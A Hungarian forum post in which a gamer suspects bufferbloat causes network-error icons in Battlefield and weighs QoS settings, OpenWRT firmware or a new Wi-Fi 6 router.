Szóval Battlefield (1+V) alatt nekem is folyamatosan kint vannak a hálózati hibákat jelző ikonok, már évek óta. Battlenonsense Bufferbloat-os videóját nézve elképzelhetőnek tartom, hogy a bufferbloat miatt.
Hogy ezt kipróbáljam megpróbálom először szoftveresen, ezzel a routerrel fixálni a dolgot, de gondolkodom azon is (ettől függetlenül is), hogy lecserélem már, és veszek valami modern példányt, ami sok évig elég lesz (ezért is kéne a Wifi6).Ezen a routeren elvileg ha CFW-ben van, Advanced QoS, akkor valamilyen szinten az tudja, illetve az OpenWRT-ben van erre jó megoldás beépítve. Most HGG-m van még fent, be is van kapcsolva, de éjjel láttam, hogy sávszél limit nincs beállítva, úgyhogy ezt még tesztelnem kell.
Ha ez nem oldja meg, akkor kipróbálnék egy OpenWRT-t is, de nem tudom mit jelent a fent idézett korlátozottan használható
Új hozzászólás Aktív témák
- Projektor topic
- Friss előzetesen az idén érkező The Last of Us második szezonja
- exHWSW - Értünk mindenhez IS
- iPhone topik
- AMD Navi Radeon™ RX 7xxx sorozat
- Milyen monitort vegyek?
- Nvidia GPU-k jövője - amit tudni vélünk
- CES 2025: prezentálta az NVIDIA az új GeForce-okat
- Debrecen és környéke adok-veszek-beszélgetek
- Foxpost
- További aktív témák...
- IPhone 15 Pro max 256GB gyári független 33 töltéssel 2027.10.30-ig Apple jótállás
- IPHONE 11 FEHÉR 64GB 79% DOBOZZAL
- Apple iPad Pro 2020 11" 128Gb (MY232HC/A) , Space Grey 6 hónap Garancia, TÖLTÉSI CIKLUS: 211 Akku:92
- PlayStation 5 (PS5) DualSense Edge vezeték nélküli kontroller - újszerű, hibátlan, sosem használt
- Thrustmaster kormány pedállal és cockpittel!
Állásajánlatok
Cég: PCMENTOR SZERVIZ KFT.
Város: Budapest